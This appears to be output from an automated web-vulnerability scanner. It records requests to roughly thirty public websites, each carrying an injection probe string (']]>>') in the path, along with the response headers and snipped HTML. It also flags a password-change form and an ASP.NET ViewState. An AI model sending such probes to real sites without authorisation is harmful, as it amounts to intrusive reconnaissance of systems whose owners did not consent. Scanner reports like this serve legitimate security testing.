HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:34:45 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28 Set-Cookie: JSESSIONID=9447E9A29 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Language: en-US Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 100956 ...[SNIP]... </div> <form name="changePassword" id="changePassword" action="/registration <input type="hidden" id="userName" name="account.userName" value="" /> ...[SNIP]... </label> <input class="inp-text" type="password" name="oldPassword" value="" /> </div> ...[SNIP]... </label> <input class="inp-text" type="password" name="newPassword" value="" /> </div> ...[SNIP]... </label> <input class="inp-text" type="password" name="confirmPassword" value="" /> </div> ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.4shared.com |
Path: | /favicon.ico |
GET /favicon.ico]]>> HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.4shared.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 /favicon.ico]]>> Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=2F3F04A95 Content-Type: text/html;charset=UTF-8 Date: Sat, 02 Apr 2011 13:25:35 GMT Content-Length: 41730 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... 316&random=0.3651618 var aj = new AjaxHelper(); aj.sendGetXMLRequest( progressBarUrl, function(respXML){ var el =respXML.getElementsByTagName( var active = el.getAttribute("active") if (active=="true"){ var totalContentLengthKbytes = el.getAttribute( ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.altervista.org |
Path: | /favicon.ico |
GET /favicon.ico]]>> HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.altervista.org Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 14:07:00 GMT Server: Apache Content-Type: text/html Content-Length: 2937 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="cref" value="http://tb ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.bathandbo |
Path: | /favicon.ico |
GET /favicon.ico]]>> HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.bathandbodyworks.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 14:05:58 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" Set-Cookie: JSESSIONID=jTy3NXtGl Set-Cookie: browser_id=123856780554; expires=Tuesday, 30-Mar-2021 14:05:58 GMT; path=/ Set-Cookie: browser_id=123856780554; expires=Tuesday, 30-Mar-2021 14:05:58 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 112794 <!DOCTYPE html> <html> <head> <!--Preview TimeZone = 'null' --><!--Preview TimeZone = 'America/New_York' --><!-- Checking storemanPD --><!-- Chec ...[SNIP]... <!-- Do not edit/add css links here. Use the min-cat project. Config file: /ant-min-cat/site-css.xml --> <link href="http://bbw.imageg ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.bizrate.com |
Path: | /favicon.ico |
GET /favicon.ico]]>> HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.bizrate.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: trafficSourceDebugParam=" P3P: CP="NON DSP ADM DEV PSD TAI OUR IND STP PRE NAV UNI" Set-Cookie: yes_email_invite=invite3; Domain=.bizrate.com; Expires=Sun, 03-Apr-2011 12:45:53 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Set-Cookie: sessionid=1204123464 Set-Cookie: br=13017483531990811 Set-Cookie: _data=_time%3A%3Astart Set-Cookie: userzip=0; Domain=.bizrate.com; Expires=Tue, 30-Mar-2021 12:45:53 GMT; Path=/ Set-Cookie: p13n_id=000138125b70 Set-Cookie: rng=6967172; Domain=.bizrate.com; Expires=Sun, 03-Apr-2011 12:45:53 GMT; Path=/ Set-Cookie: sosurvey_response=none%3A Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Sat, 02 Apr 2011 12:45:52 GMT Content-Length: 289099 <?xml version='1.0' encoding='UTF-8'?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.bravotv.com |
Path: | /favicon.ico |
GET /favicon.ico]]>> HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.bravotv.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) X-Varnish: 1648302699 Content-Type: text/html; charset=utf-8 X-Drupal-Cache: MISS Varnish-X-Cache: MISS ETag: "1301751644-0" X-PF-Uncompressing: 1 Last-Modified: Sat, 02 Apr 2011 13:40:44 +0000 X-Powered-By: PHP/5.2.8 Content-Length: 26499 Cache-Control: max-age=278 Date: Sat, 02 Apr 2011 13:40:45 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head ...[SNIP]... <a href="/sitemap.xml" title="">XML Map</a> ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.columbia.edu |
Path: | /favicon.ico |
GET /favicon.ico]]>> HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.columbia.edu Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 14:17:14 GMT Server: Apache/2.2.17 Vary: accept-language,accept Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1028 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.consumersearch |
Path: | /favicon.ico |
GET /favicon.ico]]>> HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.consumersearch.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Apache/2.2.8 (Unix) PHP/5.2.6 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.8.8 X-Powered-By: PHP/5.2.6 X-Drupal-Cache: MISS Last-Modified: Sat, 02 Apr 2011 13:36:26 +0000 ETag: "1301751386-1" Content-Type: text/html; charset=utf-8 Cache-Control: public, max-age=1799 Expires: Sat, 02 Apr 2011 14:06:28 GMT Date: Sat, 02 Apr 2011 13:36:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47602 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp <html xmlns="http://www.w3.org version="XHTML+RDFa 1.0" xmlns:xsd="http://www.w3 xmlns:addthis="http://www xmlns:fb="http://www xml:lang="en" lang="en"> ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.dicksspor |
Path: | /favicon.ico |
GET /favicon.ico]]>> HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.dickssportinggoods Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:34:12 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" Pragma: no-cache P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p Set-Cookie: JSESSIONID=WTxZNXlJH Set-Cookie: browser_id=123853471724; expires=Tuesday, 30-Mar-2021 13:34:12 GMT; path=/ Set-Cookie: browser_id=123853471724; expires=Tuesday, 30-Mar-2021 13:34:12 GMT; path=/ Set-Cookie: browser_id=123853471724; expires=Tuesday, 30-Mar-2021 13:34:12 GMT; path=/ Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 46106 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <!--Preview TimeZone = 'null' --><!--Preview TimeZone ...[SNIP]... <!-- Do not edit/add css links here. Use the min-cat project. Config file: /ant-min-cat/site-head <link href="http://DSP.imageg ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.diynetwork.com |
Path: | /favicon.ico |
GET /favicon.ico]]>> HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.diynetwork.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Apache/2.0.63 (Unix) Content-Type: text/html Date: Sat, 02 Apr 2011 14:03:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 100994 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html> <head> <title>DIY 404 Error Page : About Us : DIY Network</title> <meta name="description" conten ...[SNIP]... <!--Endeca request http://searchservices ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ehow.co.uk |
Path: | /favicon.ico |
GET /favicon.ico]]>> HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.ehow.co.uk Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html; charset=utf-8 Expires: Sat, 02 Apr 2011 14:00:49 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 02 Apr 2011 14:00:49 GMT Content-Length: 27060 Connection: close <!DOCTYPE html> <!--[if IE]><![endif]--> <html class="Corporate" lang="en" xmlns:fb="http://www <head> <meta charset="utf-8" /> ...[SNIP]... <a href="http://www.ehow.co </a> ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.examiner.com |
Path: | /favicon.ico |
GET /favicon.ico]]>> HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.examiner.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Date: Sat, 02 Apr 2011 12:45:23 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive X-Powered-By: PHP/5.2.14 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 02 Apr 2011 12:45:23 +0000 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 ETag: "1301748323" Set-Cookie: EXAMINEREDITION=921; expires=Tue, 30-Mar-2021 12:45:23 GMT; path=/; domain=.examiner.com X-Generator: Drupal 7 (http://drupal.org) X-WebNode: web8.b.examiner.com Vary: Accept-Encoding Content-Length: 57361 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp <html xmlns="http://www.w3.org ...[SNIP]... .w3.org/2000/01/rdf xmlns:sioc="http://rdfs xmlns:sioct="http://rdfs xmlns:skos="http://www.w3 xmlns:xsd="http://www.w3 xmlns:v="http://rdf.data ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.foodnetwork |
Path: | /favicon.ico |
GET /favicon.ico]]>> HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.foodnetwork.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Apache/2.0.63 (Unix) Content-Type: text/html Date: Sat, 02 Apr 2011 13:24:57 GMT Connection: close Connection: Transfer-Encoding Content-Length: 80624 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html> <head> <title>404 Error Page : ABOUT US : Food Network</title> <meta name="description" conten ...[SNIP]... <!--Endeca request http://searchServices ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.hollywoodlife |
Path: | /favicon.ico |
GET /favicon.ico]]>> HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.hollywoodlife.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Last-Modified: Sat, 02 Apr 2011 13:54:54 GMT Pragma: no-cache Server: nginx/0.7.62 X-Pingback: http://www.hollywoodlife X-Powered-By: PHP/5.3.5-0.dotdeb.0 Cache-Control: no-cache, must-revalidate Expires: Sat, 02 Apr 2011 13:54:55 GMT Date: Sat, 02 Apr 2011 13:54:55 GMT Connection: close Connection: Transfer-Encoding Content-Length: 80763 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <a href="http://feedproxy ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.house.gov |
Path: | /favicon.ico |
GET /favicon.ico]]>> HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.house.gov Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: USHR Webserver Ver 5.4.1 Content-Type: text/html Content-Length: 13462 Vary: Accept-Encoding Date: Sat, 02 Apr 2011 13:34:45 GMT Connection: close <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.k12.com |
Path: | /favicon.ico |
GET /favicon.ico]]>> HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.k12.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:41:52 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Fri, 01 Apr 2011 15:55:02 GMT ETag: "4176-49fdd6ec78180" Accept-Ranges: bytes Content-Length: 16758 Link: </labels.rdf>; /="/"; rel="meta" type="application/rdf+xml pics-label: (pics-1.1 "http://www.icra.org/pics Cache-Control: no-cache Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.kazaa.com |
Path: | /favicon.ico |
GET /favicon.ico]]>> HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.kazaa.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:44:08 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15 ETag: "a092413087f137824e7 X-Runtime: 96 X-Head-Commit-Id: 9ff26652e060b35b7a08 Cache-Control: private, max-age=0, must-revalidate Set-Cookie: user_credentials Set-Cookie: Set-Cookie: _music.kazaa.net_session Content-Length: 19127 Status: 200 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html version='XHTML+RDFa 1.0' xmlns:audio='http://purl ...[SNIP]... erms='http://purl.org/dc ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.macrumors.com |
Path: | /favicon.ico |
GET /favicon.ico]]>> HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.macrumors.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:37:47 GMT Server: Apache/1.3.41 (Unix) PHP/4.4.9 mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.8b X-Powered-By: PHP/4.4.9 Content-Type: text/html Content-Length: 101132 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <meta http-equiv="Content-Type" co ...[SNIP]... <br /> New channels: CNBC World, C-SPAN, C-SPAN 2, C-SPAN 3, Chiller, Disney XD, G4, Home Shopping Network, Jewelry Television, QVC, Sleuth, Soap Net, Style, Golf Channel, and WE tv.<br /> ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.orbitz.com |
Path: | /favicon.ico |
GET /favicon.ico]]>> HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.orbitz.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Retry-After: 0 Content-Type: text/html; charset=utf-8 Content-Length: 277 Date: Sat, 02 Apr 2011 13:34:54 GMT Age: 0 Connection: close Server: Apache Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <title>404 Not Found</tit ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.psu.edu |
Path: | /favicon.ico |
GET /favicon.ico]]>> HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.psu.edu Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 14:04:44 GMT Server: Apache/1.3.37 (Unix) Content-Type: text/x-server-parsed-html Content-Length: 5468 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.songmeanings |
Path: | /favicon.ico |
GET /favicon.ico]]>> HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.songmeanings.net Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Server: nginx Date: Sat, 02 Apr 2011 14:15:17 GMT Content-Type: text/html Connection: keep-alive Vary: Accept-Encoding X-Powered-By: PHP/5.3.3 Set-Cookie: PHPSESSID=8h1lg1ot2b Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 23838 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <ti ...[SNIP]... <a href="http://sudsonb ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.southwest.com |
Path: | /favicon.ico |
GET /favicon.ico]]>> HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.southwest.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:28:30 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=utf-8 Content-Language: en-US Set-Cookie: JSESSIONID=7BAC1D4D1 Set-Cookie: DiscCookie=disc=0%3A10 Set-Cookie: AccountBarCookie Vary: Accept-Encoding X-Swa-ws: BAHQL Content-Length: 54232 <?xml version="1.0" encoding="utf-8"?> <html xmlns="http://www.w3.org <head> <title>Southwest Airlines - File Not Found</title> <meta http-equiv= ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ufl.edu |
Path: | /favicon.ico |
GET /favicon.ico]]>> HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.ufl.edu Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:59:12 GMT Server: Apache Accept-Ranges: bytes Content-Type: text/html Content-Length: 5724 <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ultimate |
Path: | /favicon.ico |
GET /favicon.ico]]>> HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.ultimate-guitar.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: nginx Date: Sat, 02 Apr 2011 13:34:54 GMT Content-Type: text/html Connection: close Content-Length: 6622 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>#404 | File Missing @ Ultimate-Guitar.Com< <meta HTTP-EQUIV="REFRESH" CONTENT="5;URL=http://www ...[SNIP]... <img src="http://img.ultimate ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.usgs.gov |
Path: | /favicon.ico |
GET /favicon.ico]]>> HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.usgs.gov Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Content-Language: en Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Apache Vary: accept-language,accept Date: Sat, 02 Apr 2011 13:49:52 GMT Connection: close <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.where2getit |
Path: | /favicon.ico |
GET /favicon.ico]]>> HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.where2getit.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:37:33 GMT Server: Apache/2.2.13 (Linux/SUSE) Vary: accept-language,accept Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1052 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.wimp.com |
Path: | /favicon.ico |
GET /favicon.ico]]>> HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.wimp.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 02 Apr 2011 13:27:01 GMT Server: lighttpd/1.4.28 <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.wunderground |
Path: | /favicon.ico |
GET /favicon.ico]]>> HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.wunderground.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 12:46:27 GMT Server: Apache/1.3.33 (Unix) PHP/4.4.0 Cache-control: no-cache, must-revalidate, no-cache="Set-Cookie", private Expires: Fri, 01 Jan 1990 00:00:00 GMT Pragma: no-cache X-CreationTime: 0.028 Set-Cookie: DT=1301748387:21949:365 Connection: close Content-Type: text/html Content-Length: 21219 <!DOCTYPE HTML> <html> <head> <meta name="viewport" content="width=1008px"> <meta name="description" content="Weather Underground provides weather information for worldwide locations, including cu ...[SNIP]... <a href="http://wiki ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.tasteofhome |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.tasteofhome.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:51:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 84246 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_headTag">< ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMjUzNTk5OTE4 |